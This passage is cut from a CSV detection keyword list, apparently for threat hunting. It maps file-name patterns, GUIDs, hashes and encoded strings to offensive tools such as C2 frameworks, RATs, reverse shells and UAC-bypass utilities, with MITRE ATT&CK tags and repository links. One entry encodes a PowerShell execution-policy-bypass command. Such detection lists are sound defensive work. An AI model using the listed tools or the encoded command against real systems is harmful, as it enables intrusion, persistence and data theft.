TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*C2/C2Server.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*c2_server*.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*c2_server.resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*C2_Server-main*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C2concealer -*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*C2concealer-master*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*'C2Default'*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*c2endpoint.php*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*c2hlbGxjb2Rl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*c2lint *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*C2ListenerPort*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*c2-logs.txt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*c2profile.profile*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*C2ProfileManager.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*C2ProfileResponse.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*-c2-randomizer.py*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*C2ReverseClint*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2ReverseProxy*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2ReverseServer*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*C2script/proxy.*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" +"*'c2server'*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*C2Server.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*C2Server.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*C2TaskMessage.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*c2VydmVyMS5jaWEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*C2WebSocketHandler.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C526B877-6AFF-413C-BC03-1837FB63BC22*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*c708b83f-4167-4b4c-a1db-d2011ecb3200*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*C7E4B529-6372-449A-9184-74E74E432FE8*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" +"*cache_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 